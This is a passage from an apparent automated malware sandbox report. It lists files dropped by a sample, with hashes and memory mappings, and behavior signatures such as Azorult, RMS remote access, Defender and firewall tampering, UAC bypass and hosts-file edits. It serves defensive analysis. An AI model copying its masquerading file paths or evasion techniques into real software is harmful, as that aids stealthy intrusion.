| SHA512 | 46236dba79489272b6b7f9649fb8be5beb4a0b10776adf7b67ef3a9f969a977cde7a99b1b154b4b9142eb1bf72abcadbfd38abaef1eb88d7d03c646645517d0d |
memory/1764-65-0x0000000000000000-mapping.dmp
\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
memory/324-70-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
C:\ProgramData\Windows\winit.exe
| MD5 | 03a781bb33a21a742be31deb053221f3 |
| SHA1 | 3951c17d7cadfc4450c40b05adeeb9df8d4fb578 |
| SHA256 | e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210 |
| SHA512 | 010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45 |
\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
C:\ProgramData\Windows\install.vbs
| MD5 | 5e36713ab310d29f2bdd1c93f2f0cad2 |
| SHA1 | 7e768cca6bce132e4e9132e8a00a1786e6351178 |
| SHA256 | cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931 |
| SHA512 | 8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1 |
\ProgramData\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
memory/1492-81-0x0000000000000000-mapping.dmp
\ProgramData\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
memory/1736-82-0x0000000000000000-mapping.dmp
C:\ProgramData\install\ink.exe
| MD5 | ef3839826ed36f3a534d1d099665b909 |
| SHA1 | 8afbee7836c8faf65da67a9d6dd901d44a8c55ca |
| SHA256 | 136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040 |
| SHA512 | 040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8 |
C:\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
C:\ProgramData\Microsoft\Intel\taskhost.exe
| MD5 | c5ec8996fc800325262f5d066f5d61c9 |
| SHA1 | 95f8e486960d1ddbec88be92ef71cb03a3643291 |
| SHA256 | 892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db |
| SHA512 | 4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a |
C:\programdata\microsoft\intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
\ProgramData\Microsoft\Intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
memory/1472-89-0x0000000000000000-mapping.dmp
memory/1480-90-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\P.exe
| MD5 | b78c384bff4c80a590f048050621fe87 |
| SHA1 | f006f71b0228b99917746001bc201dbfd9603c38 |
| SHA256 | 8215e35c9ce15a7b7373871b27100577d3e609856eac71080ac13972a6a6748b |
| SHA512 | 479acd0d45e5add285ba4472a56918f6933f043c8f28822968ddc724084f8a8cf1fe718d864183eb9e61826e7e16fcc473891520b88591f5dfdef72359084eab |
memory/552-95-0x0000000000000000-mapping.dmp
memory/1716-97-0x0000000000000000-mapping.dmp
memory/1620-96-0x0000000000000000-mapping.dmp
C:\Programdata\Windows\install.bat
| MD5 | db76c882184e8d2bac56865c8e88f8fd |
| SHA1 | fc6324751da75b665f82a3ad0dcc36bf4b91dfac |
| SHA256 | e3db831cdb021d6221be26a36800844e9af13811bac9e4961ac21671dff9207a |
| SHA512 | da3ca7a3429bb9250cc8b6e33f25b5335a5383d440b16940e4b6e6aca82f2b673d8a01419606746a8171106f31c37bfcdb5c8e33e57fce44c8edb475779aea92 |
memory/1896-99-0x0000000000000000-mapping.dmp
memory/1740-100-0x0000000000000000-mapping.dmp
memory/1160-102-0x0000000000000000-mapping.dmp
memory/1476-103-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\reg1.reg
| MD5 | 806734f8bff06b21e470515e314cfa0d |
| SHA1 | d4ef2552f6e04620f7f3d05f156c64888c9c97ee |
| SHA256 | 7ae7e4c0155f559f3c31be25d9e129672a88b445af5847746fe0a9aab3e79544 |
| SHA512 | 007a79f0023a792057b81483f7428956ab99896dd1c8053cac299de5834ac25da2f6f77b63f6c7d46c51ed7a91b8eccb1c082043028326bfa0bfcb47f2b0d207 |
memory/652-105-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\reg2.reg
| MD5 | 6a5d2192b8ad9e96a2736c8b0bdbd06e |
| SHA1 | 235a78495192fc33f13af3710d0fe44e86a771c9 |
| SHA256 | 4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a |
| SHA512 | 411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d |
memory/736-108-0x0000000000000000-mapping.dmp
memory/1668-109-0x0000000000000000-mapping.dmp
memory/1724-110-0x0000000000000000-mapping.dmp
memory/2012-111-0x0000000000000000-mapping.dmp
memory/1612-112-0x0000000000000000-mapping.dmp
memory/884-113-0x0000000000000000-mapping.dmp
memory/268-114-0x0000000000000000-mapping.dmp
memory/1764-115-0x0000000000000000-mapping.dmp
memory/1312-116-0x0000000000000000-mapping.dmp
\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1768-119-0x0000000000000000-mapping.dmp
memory/1104-122-0x0000000000000000-mapping.dmp
memory/1708-123-0x0000000000000000-mapping.dmp
memory/1768-124-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-125-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-126-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-127-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1768-128-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/288-129-0x0000000000000000-mapping.dmp
memory/1064-130-0x0000000000000000-mapping.dmp
memory/1572-131-0x0000000000000000-mapping.dmp
memory/1768-132-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1908-133-0x0000000000000000-mapping.dmp
memory/1628-134-0x0000000000000000-mapping.dmp
memory/436-135-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1476-138-0x0000000000000000-mapping.dmp
memory/436-139-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/436-140-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/436-141-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/436-143-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1944-142-0x0000000000000000-mapping.dmp
memory/436-144-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1664-145-0x0000000000000000-mapping.dmp
memory/1344-146-0x0000000000000000-mapping.dmp
memory/436-148-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/944-147-0x0000000000000000-mapping.dmp
memory/1968-149-0x0000000000000000-mapping.dmp
memory/880-153-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1968-155-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1968-156-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1968-157-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1968-158-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1372-159-0x0000000000000000-mapping.dmp
memory/1712-160-0x0000000000000000-mapping.dmp
C:\ProgramData\Windows\rutserv.exe
| MD5 | 37a8802017a212bb7f5255abc7857969 |
| SHA1 | cb10c0d343c54538d12db8ed664d0a1fa35b6109 |
| SHA256 | 1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6 |
| SHA512 | 4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0 |
memory/1968-154-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1448-150-0x0000000000000000-mapping.dmp
memory/1188-163-0x0000000000000000-mapping.dmp
memory/1064-164-0x0000000000000000-mapping.dmp
memory/1220-165-0x0000000000000000-mapping.dmp
memory/1496-166-0x0000000000000000-mapping.dmp
memory/996-167-0x0000000000000000-mapping.dmp
memory/1872-168-0x0000000000000000-mapping.dmp
memory/1628-169-0x0000000000000000-mapping.dmp
memory/1164-170-0x0000000000000000-mapping.dmp
memory/640-171-0x0000000000000000-mapping.dmp
memory/1740-172-0x0000000000000000-mapping.dmp
memory/944-175-0x0000000000000000-mapping.dmp
memory/884-174-0x0000000000000000-mapping.dmp
memory/1832-173-0x0000000000000000-mapping.dmp
memory/880-177-0x0000000000000000-mapping.dmp
memory/1120-176-0x0000000000000000-mapping.dmp
memory/1976-178-0x0000000000000000-mapping.dmp
C:\programdata\microsoft\intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
\ProgramData\Microsoft\Intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
memory/1712-181-0x0000000000000000-mapping.dmp
memory/1776-182-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Intel\R8.exe
| MD5 | ad95d98c04a3c080df33ed75ad38870f |
| SHA1 | abbb43f7b7c86d7917d4582e47245a40ca3f33c0 |
| SHA256 | 40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd |
| SHA512 | 964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed |
memory/1992-185-0x0000000000000000-mapping.dmp
memory/1908-186-0x0000000000000000-mapping.dmp
C:\rdp\run.vbs
| MD5 | 6a5f5a48072a1adae96d2bd88848dcff |
| SHA1 | b381fa864db6c521cbf1133a68acf1db4baa7005 |
| SHA256 | c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe |
| SHA512 | d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c |
C:\rdp\pause.bat
| MD5 | a47b870196f7f1864ef7aa5779c54042 |
| SHA1 | dcb71b3e543cbd130a9ec47d4f847899d929b3d2 |
| SHA256 | 46565c0588b170ae02573fde80ba9c0a2bfe3c6501237404d9bd105a2af01cba |
| SHA512 | b8da14068afe3ba39fc5d85c9d62c206a9342fb0712c115977a1724e1ad52a2f0c14f3c07192dce946a15b671c5d20e35decd2bfb552065e7c194a2af5e9ca60 |
memory/1600-190-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-191-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-192-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-193-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1600-194-0x0000000000400000-0x0000000000AB9000-memory.dmp
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
C:\ProgramData\Microsoft\Intel\winlog.exe
| MD5 | 4b2dbc48d42245ef50b975a7831e071c |
| SHA1 | 3aab9b62004f14171d1f018cf74d2a804d74ef80 |
| SHA256 | 54eda5cc37afb3b725fa2078941b3b93b6aec7b8c61cd83b9b2580263ce54724 |
| SHA512 | f563e9c6bc521c02490fe66df6cc836e57ec007377efb72259f4a3ae4eb08c4fd43720322982fb211cf8d429874c8795c1a7903cdb79ad92b5174ec5c94533dd |
\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
C:\ProgramData\Microsoft\Intel\winlogon.exe
| MD5 | 2f6a1bffbff81e7c69d8aa7392175a72 |
| SHA1 | 94ac919d2a20aa16156b66ed1c266941696077da |
| SHA256 | dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de |
| SHA512 | ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37 |
C:\ProgramData\Windows\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
C:\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
C:\ProgramData\Windows\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
C:\Users\Admin\AppData\Local\Temp\FF94.tmp\FF95.bat
| MD5 | cfc53d3f9b3716accf268c899f1b0ecb |
| SHA1 | 75b9ae89be46a54ed2606de8d328f81173180b2c |
| SHA256 | f293caa096cc51a511cedd76fd011a275fb8a30b6a93542ded718930a7d12ee9 |
| SHA512 | 0c090e2ed2f3f7b2c00cbb6583df5723a3d0781738eafc37b2e630f46b5b470a5a7dbc44a2f2e8d043f83c753ddf5f72b1d67c0a7e73241e47cd24c92b4ce7d4 |
memory/1080-208-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp
\ProgramData\Windows\rfusclient.exe
| MD5 | b8667a1e84567fcf7821bcefb6a444af |
| SHA1 | 9c1f91fe77ad357c8f81205d65c9067a270d61f0 |
| SHA256 | dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9 |
| SHA512 | ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852 |
memory/1944-217-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-216-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-218-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\ProgramData\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
memory/1968-221-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1944-219-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-220-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1944-224-0x0000000000400000-0x00000000009B6000-memory.dmp
\ProgramData\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
memory/1204-225-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Programdata\RealtekHD\taskhostw.exe
| MD5 | 639a6e9e1949265f493c1a3505bc3430 |
| SHA1 | 416384c79557c0a2d1e56e9449ac04d71c9f3477 |
| SHA256 | a0bb963a090b975d79786265a0f5fe6b61b8bfcc1bc623559b64b1b9939897fd |
| SHA512 | 57400dc5e6e3dbb12cca0141f316b385f1705efd154f6dbfcdc5a109c26ca8e1138c94a46c2811d14e85468d5acc9a4422c0d4e07e9d78fa6a69aeaccf733cb7 |
memory/1944-228-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1204-229-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1944-230-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1080-209-0x000007FEF37F0000-0x000007FEF4213000-memory.dmp
memory/1080-239-0x00000000025C4000-0x00000000025C7000-memory.dmp
C:\programdata\microsoft\temp\H.bat
| MD5 | 76303bb3bb0faa707000df998d8c9f3d |
| SHA1 | 5b25444c92c7625e1ca77ed2eb1b4ba6877ba066 |
| SHA256 | a33af2b70ad8fea8900b6bd31ac7b0aab8a2b8b79e3e27adafbd34bdfcb67549 |
| SHA512 | 25e34a1c1507d96e3a9a9722370ee98c85c900329ea74054783cd486a384f088bfe49e6662aa7eb3fc6db58a0178eb8a8851e13b608831bdd828830b8fdf981c |
C:\ProgramData\WindowsTask\winlogon.exe
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
C:\Programdata\WindowsTask\winlogon.exe
| MD5 | ec0f9398d8017767f86a4d0e74225506 |
| SHA1 | 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36 |
| SHA256 | 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375 |
| SHA512 | d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484 |
C:\ProgramData\microsoft\Temp\5.xml
| MD5 | 487497f0faaccbf26056d9470eb3eced |
| SHA1 | e1be3341f60cfed1521a2cabc5d04c1feae61707 |
| SHA256 | 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5 |
| SHA512 | 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd |
C:\programdata\microsoft\temp\Temp.bat
| MD5 | 9380f21201174ac1267aa944e1096955 |
| SHA1 | e97bd59509694d057daaf698a933092f804fe2e3 |
| SHA256 | ccf47d036ccfe0c8d0fe2854d14ca21d99be5fa11d0fbb16edcc1d6c10de3512 |
| SHA512 | ff4d2172c75a90b1af183fddc483d7a6d908593cb47009f37818066dee021bf7172b8890502fb26d248d39479c6276dce120b570e31f43fcc616db4b43c67e27 |
C:\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
\rdp\Rar.exe
| MD5 | 2e86a9862257a0cf723ceef3868a1a12 |
| SHA1 | a4324281823f0800132bf13f5ad3860e6b5532c6 |
| SHA256 | 2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8 |
| SHA512 | 3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de |
memory/1080-264-0x00000000025CB000-0x00000000025EA000-memory.dmp
memory/1440-272-0x0000000000400000-0x00000000009B6000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-16 19:23
Reported
2022-05-16 19:33
Platform
win10v2004-20220414-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
Azorult
Modifies Windows Defender Real-time Protection settings
Modifies visibility of hidden/system files in Explorer
RMS
UAC bypass
Windows security bypass
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\programdata\install\cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A |
